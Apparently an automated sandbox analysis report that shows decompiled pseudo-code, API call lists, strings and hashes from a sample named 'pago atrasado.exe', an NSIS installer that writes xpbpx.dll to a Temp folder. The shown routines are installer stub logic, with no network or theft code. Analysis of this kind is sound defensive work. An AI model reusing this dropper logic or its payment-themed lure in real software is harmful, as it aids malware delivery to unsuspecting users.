                                            				intOrPtr _v8;
                                            				int _v12;
                                            				int _v16;
                                            				char _v20;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t20;
                                            				signed int _t24;
                                            				void* _t28;
                                            				void* _t30;
                                            				int _t31;
                                            				void* _t34;
                                            				int _t37;
                                            				int _t38;
                                            				intOrPtr _t39;
                                            				int _t42;
                                            				intOrPtr _t60;
                                            				char _t62;
                                            				CHAR* _t64;
                                            				signed char _t68;
                                            				struct HINSTANCE__* _t76;
                                            				CHAR* _t79;
                                            				intOrPtr _t81;
                                            				CHAR* _t85;
                                            
                                            				_t81 =  *0x423f50; // 0x661638
                                            				_t20 = E00405F28(3);
                                            				_t88 = _t20;
                                            				if(_t20 == 0) {
                                            					_t79 = 0x420538;
                                            					"1033" = 0x7830;
                                            					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
                                            					__eflags =  *0x420538;
                                            					if(__eflags == 0) {
                                            						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
                                            					}
                                            					lstrcatA("1033", _t79);
                                            				} else {
                                            					E00405AF6("1033",  *_t20() & 0x0000ffff);
                                            				}
                                            				E004038B4(_t76, _t88);
                                            				_t24 =  *0x423f58; // 0x80
                                            				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
                                            				 *0x423fc0 = _t24 & 0x00000020;
                                            				 *0x423fdc = 0x10000;
                                            				if(E0040576C(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
                                            					L16:
                                            					if(E0040576C(_t96, _t84) == 0) {
                                            						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
                                            					}
                                            					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
                                            					 *0x423728 = _t28;
                                            					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                            						L21:
                                            						if(E0040140B(0) == 0) {
                                            							_t30 = E004038B4(_t76, __eflags);
                                            							__eflags =  *0x423fe0; // 0x0
                                            							if(__eflags != 0) {
                                            								_t31 = E00404F56(_t30, 0);
                                            								__eflags = _t31;
                                            								if(_t31 == 0) {
                                            									E0040140B(1);
                                            									goto L33;
                                            								}
                                            								__eflags =  *0x42370c; // 0x0
                                            								if(__eflags == 0) {
                                            									E0040140B(2);
                                            								}
                                            								goto L22;
                                            							}
                                            							ShowWindow( *0x420510, 5); // executed
                                            							_t37 = E00405EBA("RichEd20"); // executed
                                            							__eflags = _t37;
                                            							if(_t37 == 0) {
                                            								E00405EBA("RichEd32");
                                            							}
                                            							_t85 = "RichEdit20A";
                                            							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
                                            							__eflags = _t38;
                                            							if(_t38 == 0) {
                                            								GetClassInfoA(0, "RichEdit", 0x4236e0);
                                            								 *0x423704 = _t85;
                                            								RegisterClassA(0x4236e0);
                                            							}
                                            							_t39 =  *0x423720; // 0x0
                                            							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
                                            							E0040353B(E0040140B(5), 1);
                                            							return _t42;
                                            						}
                                            						L22:
                                            						_t34 = 2;
                                            						return _t34;
                                            					} else {
                                            						_t76 =  *0x423f40; // 0x400000
                                            						 *0x4236f4 = _t28;
                                            						_v20 = 0x624e5f;
                                            						 *0x4236e4 = E00401000;
                                            						 *0x4236f0 = _t76;
                                            						 *0x423704 =  &_v20;
                                            						if(RegisterClassA(0x4236e0) == 0) {
                                            							L33:
                                            							__eflags = 0;
                                            							return 0;
                                            						}
                                            						_t12 =  &_v16; // 0x624e5f
                                            						SystemParametersInfoA(0x30, 0, _t12, 0);
                                            						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
                                            						goto L21;
                                            					}
                                            				} else {
                                            					_t76 =  *(_t81 + 0x48);
                                            					if(_t76 == 0) {
                                            						goto L16;
                                            					}
                                            					_t60 =  *0x423f78; // 0x6656e0
                                            					_t79 = 0x422ee0;
                                            					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
                                            					_t62 =  *0x422ee0; // 0x63
                                            					if(_t62 == 0) {
                                            						goto L16;
                                            					}
                                            					if(_t62 == 0x22) {
                                            						_t79 = 0x422ee1;
                                            						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
                                            					}
                                            					_t64 = lstrlenA(_t79) + _t79 - 4;
                                            					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                            						L15:
                                            						E00405B98(_t84, E0040568B(_t79));
                                            						goto L16;
                                            					} else {
                                            						_t68 = GetFileAttributesA(_t79);
                                            						if(_t68 == 0xffffffff) {
                                            							L14:
                                            							E004056D2(_t79);
                                            							goto L15;
                                            						}
                                            						_t96 = _t68 & 0x00000010;
                                            						if((_t68 & 0x00000010) != 0) {
                                            							goto L15;
                                            						}
                                            						goto L14;
                                            					}
                                            				}
                                            			}

                                            APIs
                                              • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                              • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                            • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000), ref: 0040365C
                                            • lstrlenA.KERNEL32(cuwawvnlx,?,?,?,cuwawvnlx,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                            • lstrcmpiA.KERNEL32(?,.exe,cuwawvnlx,?,?,?,cuwawvnlx,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                            • GetFileAttributesA.KERNEL32(cuwawvnlx), ref: 004036EF
                                            • LoadImageA.USER32 ref: 00403738
                                              • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                            • RegisterClassA.USER32 ref: 0040377F
                                            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                            • CreateWindowExA.USER32 ref: 004037D0
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                            • GetClassInfoA.USER32 ref: 00403832
                                            • GetClassInfoA.USER32 ref: 0040383F
                                            • RegisterClassA.USER32 ref: 00403848
                                            • DialogBoxParamA.USER32 ref: 00403867
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$cuwawvnlx$6B
                                            • API String ID: 1975747703-3229038323
                                            • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                            • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                            • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                            • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E00402C55(void* __eflags, signed int _a4) {
                                            				DWORD* _v8;
                                            				DWORD* _v12;
                                            				void* _v16;
                                            				intOrPtr _v20;
                                            				long _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				signed int _v44;
                                            				long _t43;
                                            				signed int _t50;
                                            				void* _t53;
                                            				signed int _t54;
                                            				void* _t57;
                                            				intOrPtr* _t59;
                                            				long _t60;
                                            				signed int _t65;
                                            				signed int _t67;
                                            				signed int _t70;
                                            				signed int _t71;
                                            				signed int _t77;
                                            				intOrPtr _t80;
                                            				long _t82;
                                            				signed int _t85;
                                            				signed int _t87;
                                            				void* _t89;
                                            				signed int _t90;
                                            				signed int _t93;
                                            				void* _t94;
                                            
                                            				_t82 = 0;
                                            				_v12 = 0;
                                            				_v8 = 0;
                                            				_t43 = GetTickCount();
                                            				_t91 = "C:\\Users\\alfons\\Desktop\\pago atrasado.exe";
                                            				 *0x423f4c = _t43 + 0x3e8;
                                            				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\pago atrasado.exe", 0x400);
                                            				_t89 = E0040586F(_t91, 0x80000000, 3);
                                            				_v16 = _t89;
                                            				 *0x409014 = _t89;
                                            				if(_t89 == 0xffffffff) {
                                            					return "Error launching installer";
                                            				}
                                            				_t92 = "C:\\Users\\alfons\\Desktop";
                                            				E00405B98("C:\\Users\\alfons\\Desktop", _t91);
                                            				E00405B98(0x42c000, E004056D2(_t92));
                                            				_t50 = GetFileSize(_t89, 0);
                                            				__eflags = _t50;
                                            				 *0x41f0e8 = _t50;
                                            				_t93 = _t50;
                                            				if(_t50 <= 0) {
                                            					L24:
                                            					E00402BF1(1);
                                            					__eflags =  *0x423f54 - _t82; // 0x8200
                                            					if(__eflags == 0) {
                                            						goto L29;
                                            					}
                                            					__eflags = _v8 - _t82;
                                            					if(_v8 == _t82) {
                                            						L28:
                                            						_t53 = GlobalAlloc(0x40, _v24); // executed
                                            						_t94 = _t53;
                                            						_t54 =  *0x423f54; // 0x8200
                                            						E004030B3(_t54 + 0x1c);
                                            						_push(_v24);
                                            						_push(_t94);
                                            						_push(_t82);
                                            						_push(0xffffffff); // executed
                                            						_t57 = E00402E8E(); // executed
                                            						__eflags = _t57 - _v24;
                                            						if(_t57 == _v24) {
                                            							__eflags = _v44 & 0x00000001;
                                            							 *0x423f50 = _t94;
                                            							 *0x423f58 =  *_t94;
                                            							if((_v44 & 0x00000001) != 0) {
                                            								 *0x423f5c =  *0x423f5c + 1;
                                            								__eflags =  *0x423f5c;
                                            							}
                                            							_t40 = _t94 + 0x44; // 0x44
                                            							_t59 = _t40;
                                            							_t85 = 8;
                                            							do {
                                            								_t59 = _t59 - 8;
                                            								 *_t59 =  *_t59 + _t94;
                                            								_t85 = _t85 - 1;
                                            								__eflags = _t85;
                                            							} while (_t85 != 0);
                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                            							 *(_t94 + 0x3c) = _t60;
                                            							E00405830(0x423f60, _t94 + 4, 0x40);
                                            							__eflags = 0;
                                            							return 0;
                                            						}
                                            						goto L29;
                                            					}
                                            					E004030B3( *0x40b0d8);
                                            					_t65 = E00403081( &_a4, 4);
                                            					__eflags = _t65;
                                            					if(_t65 == 0) {
                                            						goto L29;
                                            					}
                                            					__eflags = _v12 - _a4;
                                            					if(_v12 != _a4) {
                                            						goto L29;
                                            					}
                                            					goto L28;
                                            				} else {
                                            					do {
                                            						_t67 =  *0x423f54; // 0x8200
                                            						_t90 = _t93;
                                            						asm("sbb eax, eax");
                                            						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                            						__eflags = _t93 - _t70;
                                            						if(_t93 >= _t70) {
                                            							_t90 = _t70;
                                            						}
                                            						_t71 = E00403081(0x4170e8, _t90); // executed
                                            						__eflags = _t71;
                                            						if(_t71 == 0) {
                                            							E00402BF1(1);
                                            							L29:
                                            							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                            						}
                                            						__eflags =  *0x423f54;
                                            						if( *0x423f54 != 0) {
                                            							__eflags = _a4 & 0x00000002;
                                            							if((_a4 & 0x00000002) == 0) {
                                            								E00402BF1(0);
                                            							}
                                            							goto L20;
                                            						}
                                            						E00405830( &_v44, 0x4170e8, 0x1c);
                                            						_t77 = _v44;
                                            						__eflags = _t77 & 0xfffffff0;
                                            						if((_t77 & 0xfffffff0) != 0) {
                                            							goto L20;
                                            						}
                                            						__eflags = _v40 - 0xdeadbeef;
                                            						if(_v40 != 0xdeadbeef) {
                                            							goto L20;
                                            						}
                                            						__eflags = _v28 - 0x74736e49;
                                            						if(_v28 != 0x74736e49) {
                                            							goto L20;
                                            						}
                                            						__eflags = _v32 - 0x74666f73;
                                            						if(_v32 != 0x74666f73) {
                                            							goto L20;
                                            						}
                                            						__eflags = _v36 - 0x6c6c754e;
                                            						if(_v36 != 0x6c6c754e) {
                                            							goto L20;
                                            						}
                                            						_a4 = _a4 | _t77;
                                            						_t87 =  *0x40b0d8; // 0x8200
                                            						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
                                            						_t80 = _v20;
                                            						__eflags = _t80 - _t93;
                                            						 *0x423f54 = _t87;
                                            						if(_t80 > _t93) {
                                            							goto L29;
                                            						}
                                            						__eflags = _a4 & 0x00000008;
                                            						if((_a4 & 0x00000008) != 0) {
                                            							L16:
                                            							_v8 = _v8 + 1;
                                            							_t93 = _t80 - 4;
                                            							__eflags = _t90 - _t93;
                                            							if(_t90 > _t93) {
                                            								_t90 = _t93;
                                            							}
                                            							goto L20;
                                            						}
                                            						__eflags = _a4 & 0x00000004;
                                            						if((_a4 & 0x00000004) != 0) {
                                            							break;
                                            						}
                                            						goto L16;
                                            						L20:
                                            						__eflags = _t93 -  *0x41f0e8;
                                            						if(_t93 <  *0x41f0e8) {
                                            							_v12 = E00405F97(_v12, 0x4170e8, _t90);
                                            						}
                                            						 *0x40b0d8 =  *0x40b0d8 + _t90;
                                            						_t93 = _t93 - _t90;
                                            						__eflags = _t93;
                                            					} while (_t93 > 0);
                                            					_t82 = 0;
                                            					__eflags = 0;
                                            					goto L24;
                                            				}
                                            			}

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402C66
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\pago atrasado.exe,00000400), ref: 00402C82
                                              • Part of subcall function 0040586F: GetFileAttributesA.KERNEL32(00000003,00402C95,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 00405873
                                              • Part of subcall function 0040586F: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                            • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pago atrasado.exe,C:\Users\user\Desktop\pago atrasado.exe,80000000,00000003), ref: 00402CCE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\pago atrasado.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                            • API String ID: 4283519449-3784839127
                                            • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                            • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                            • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                            • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E00401751(FILETIME* __ebx, void* __eflags) {
                                            				void* _t33;
                                            				void* _t41;
                                            				void* _t43;
                                            				FILETIME* _t49;
                                            				FILETIME* _t62;
                                            				void* _t64;
                                            				signed int _t70;
                                            				FILETIME* _t71;
                                            				FILETIME* _t75;
                                            				signed int _t77;
                                            				void* _t80;
                                            				CHAR* _t82;
                                            				void* _t85;
                                            
                                            				_t75 = __ebx;
                                            				_t82 = E00402A29(0x31);
                                            				 *(_t85 - 0xc) = _t82;
                                            				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                            				_t33 = E004056F8(_t82);
                                            				_push(_t82);
                                            				if(_t33 == 0) {
                                            					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
                                            				} else {
                                            					_push(0x409c10);
                                            					E00405B98();
                                            				}
                                            				E00405DFA(0x409c10);
                                            				while(1) {
                                            					__eflags =  *(_t85 + 8) - 3;
                                            					if( *(_t85 + 8) >= 3) {
                                            						_t64 = E00405E93(0x409c10);
                                            						_t77 = 0;
                                            						__eflags = _t64 - _t75;
                                            						if(_t64 != _t75) {
                                            							_t71 = _t64 + 0x14;
                                            							__eflags = _t71;
                                            							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                            						}
                                            						asm("sbb eax, eax");
                                            						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                            						__eflags = _t70;
                                            						 *(_t85 + 8) = _t70;
                                            					}
                                            					__eflags =  *(_t85 + 8) - _t75;
                                            					if( *(_t85 + 8) == _t75) {
                                            						E00405850(0x409c10);
                                            					}
                                            					__eflags =  *(_t85 + 8) - 1;
                                            					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                            					__eflags = _t41 - 0xffffffff;
                                            					 *(_t85 - 8) = _t41;
                                            					if(_t41 != 0xffffffff) {
                                            						break;
                                            					}
                                            					__eflags =  *(_t85 + 8) - _t75;
                                            					if( *(_t85 + 8) != _t75) {
                                            						E00404E84(0xffffffe2,  *(_t85 - 0xc));
                                            						__eflags =  *(_t85 + 8) - 2;
                                            						if(__eflags == 0) {
                                            							 *((intOrPtr*)(_t85 - 4)) = 1;
                                            						}
                                            						L31:
                                            						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
                                            						__eflags =  *0x423fc8;
                                            						goto L32;
                                            					} else {
                                            						E00405B98(0x40a410, 0x425000);
                                            						E00405B98(0x425000, 0x409c10);
                                            						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\alfons\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                            						E00405B98(0x425000, 0x40a410);
                                            						_t62 = E00405459("C:\Users\alfons\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll",  *(_t85 - 0x28) >> 3) - 4;
                                            						__eflags = _t62;
                                            						if(_t62 == 0) {
                                            							continue;
                                            						} else {
                                            							__eflags = _t62 == 1;
                                            							if(_t62 == 1) {
                                            								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
                                            								L32:
                                            								_t49 = 0;
                                            								__eflags = 0;
                                            							} else {
                                            								_push(0x409c10);
                                            								_push(0xfffffffa);
                                            								E00404E84();
                                            								L29:
                                            								_t49 = 0x7fffffff;
                                            							}
                                            						}
                                            					}
                                            					L33:
                                            					return _t49;
                                            				}
                                            				E00404E84(0xffffffea,  *(_t85 - 0xc));
                                            				 *0x423ff4 =  *0x423ff4 + 1;
                                            				_push(_t75);
                                            				_push(_t75);
                                            				_push( *(_t85 - 8));
                                            				_push( *((intOrPtr*)(_t85 - 0x20)));
                                            				_t43 = E00402E8E(); // executed
                                            				 *0x423ff4 =  *0x423ff4 - 1;
                                            				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                            				_t80 = _t43;
                                            				if( *(_t85 - 0x1c) != 0xffffffff) {
                                            					L22:
                                            					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                            				} else {
                                            					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                            					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                            						goto L22;
                                            					}
                                            				}
                                            				FindCloseChangeNotification( *(_t85 - 8)); // executed
                                            				__eflags = _t80 - _t75;
                                            				if(_t80 >= _t75) {
                                            					goto L31;
                                            				} else {
                                            					__eflags = _t80 - 0xfffffffe;
                                            					if(_t80 != 0xfffffffe) {
                                            						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
                                            					} else {
                                            						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
                                            						lstrcatA(0x409c10,  *(_t85 - 0xc));
                                            					}
                                            					_push(0x200010);
                                            					_push(0x409c10);
                                            					E00405459();
                                            					goto L29;
                                            				}
                                            				goto L33;
                                            			}
                                            0x0040187b
                                            0x00401880
                                            0x00401886
                                            0x00401887
                                            0x00401888
                                            0x0040188b
                                            0x0040188e
                                            0x00401893
                                            0x00401899
                                            0x0040189d
                                            0x0040189f
                                            0x004018a7
                                            0x004018b3
                                            0x004018a1
                                            0x004018a1
                                            0x004018a5
                                            0x00000000
                                            0x00000000
                                            0x004018a5
                                            0x004018bc
                                            0x004018c2
                                            0x004018c4
                                            0x00000000
                                            0x004018ca
                                            0x004018ca
                                            0x004018cd
                                            0x004018e5
                                            0x004018cf
                                            0x004018d2
                                            0x004018db
                                            0x004018db
                                            0x004018ea
                                            0x004018ef
                                            0x0040223c
                                            0x00000000
                                            0x0040223c
                                            0x00000000

                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,cuwawvnlx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                            • CompareFileTime.KERNEL32(-00000014,?,cuwawvnlx,cuwawvnlx,00000000,00000000,cuwawvnlx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                              • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,cuflzcqvvfgho Setup,NSIS Error), ref: 00405BA5
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                              • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                              • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsw7E57.tmp$C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll$cuwawvnlx
                                            • API String ID: 1941528284-2478133618
                                            • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                            • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                            • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                            • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                            				signed int _v8;
                                            				long _v12;
                                            				long _v16;
                                            				long _v20;
                                            				intOrPtr _v24;
                                            				char _v88;
                                            				void* _t62;
                                            				void* _t63;
                                            				intOrPtr _t74;
                                            				long _t75;
                                            				int _t78;
                                            				void* _t88;
                                            				intOrPtr _t91;
                                            				void* _t93;
                                            				long _t96;
                                            				signed int _t97;
                                            				long _t98;
                                            				int _t99;
                                            				void* _t100;
                                            				long _t101;
                                            				void* _t102;
                                            
                                            				_t97 = _a16;
                                            				_t93 = _a12;
                                            				_v12 = _t97;
                                            				if(_t93 == 0) {
                                            					_v12 = 0x8000;
                                            				}
                                            				_v8 = _v8 & 0x00000000;
                                            				_t88 = _t93;
                                            				if(_t93 == 0) {
                                            					_t88 = 0x40f0e0;
                                            				}
                                            				_t60 = _a4;
                                            				if(_a4 >= 0) {
                                            					_t91 =  *0x423f98; // 0x946d
                                            					E004030B3(_t91 + _t60);
                                            				}
                                            				_t62 = E00403081( &_a16, 4); // executed
                                            				if(_t62 == 0) {
                                            					L34:
                                            					_push(0xfffffffd);
                                            					goto L35;
                                            				} else {
                                            					if((_a19 & 0x00000080) == 0) {
                                            						if(_t93 == 0) {
                                            							while(_a16 > 0) {
                                            								_t98 = _v12;
                                            								if(_a16 < _t98) {
                                            									_t98 = _a16;
                                            								}
                                            								if(E00403081(0x40b0e0, _t98) == 0) {
                                            									goto L34;
                                            								} else {
                                            									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
                                            										L29:
                                            										_push(0xfffffffe);
                                            										L35:
                                            										_pop(_t63);
                                            										return _t63;
                                            									} else {
                                            										_v8 = _v8 + _t98;
                                            										_a16 = _a16 - _t98;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            							L45:
                                            							return _v8;
                                            						}
                                            						if(_a16 < _t97) {
                                            							_t97 = _a16;
                                            						}
                                            						if(E00403081(_t93, _t97) != 0) {
                                            							_v8 = _t97;
                                            							goto L45;
                                            						} else {
                                            							goto L34;
                                            						}
                                            					}
                                            					_v16 = GetTickCount();
                                            					E00406005(0x40b050);
                                            					_t13 =  &_a16;
                                            					 *_t13 = _a16 & 0x7fffffff;
                                            					_a4 = _a16;
                                            					if( *_t13 <= 0) {
                                            						goto L45;
                                            					} else {
                                            						goto L9;
                                            					}
                                            					while(1) {
                                            						L9:
                                            						_t99 = 0x4000;
                                            						if(_a16 < 0x4000) {
                                            							_t99 = _a16;
                                            						}
                                            						if(E00403081(0x40b0e0, _t99) == 0) {
                                            							goto L34;
                                            						}
                                            						_a16 = _a16 - _t99;
                                            						 *0x40b068 = 0x40b0e0;
                                            						 *0x40b06c = _t99;
                                            						while(1) {
                                            							 *0x40b070 = _t88;
                                            							 *0x40b074 = _v12; // executed
                                            							_t74 = E00406025(0x40b050); // executed
                                            							_v24 = _t74;
                                            							if(_t74 < 0) {
                                            								break;
                                            							}
                                            							_t100 =  *0x40b070; // 0x40f0e0
                                            							_t101 = _t100 - _t88;
                                            							_t75 = GetTickCount();
                                            							_t96 = _t75;
                                            							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
                                            								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                            								_t102 = _t102 + 0xc;
                                            								E00404E84(0,  &_v88);
                                            								_v16 = _t96;
                                            							}
                                            							if(_t101 == 0) {
                                            								if(_a16 > 0) {
                                            									goto L9;
                                            								}
                                            								goto L45;
                                            							} else {
                                            								if(_a12 != 0) {
                                            									_v8 = _v8 + _t101;
                                            									_v12 = _v12 - _t101;
                                            									_t88 =  *0x40b070; // 0x40f0e0
                                            									L24:
                                            									if(_v24 != 1) {
                                            										continue;
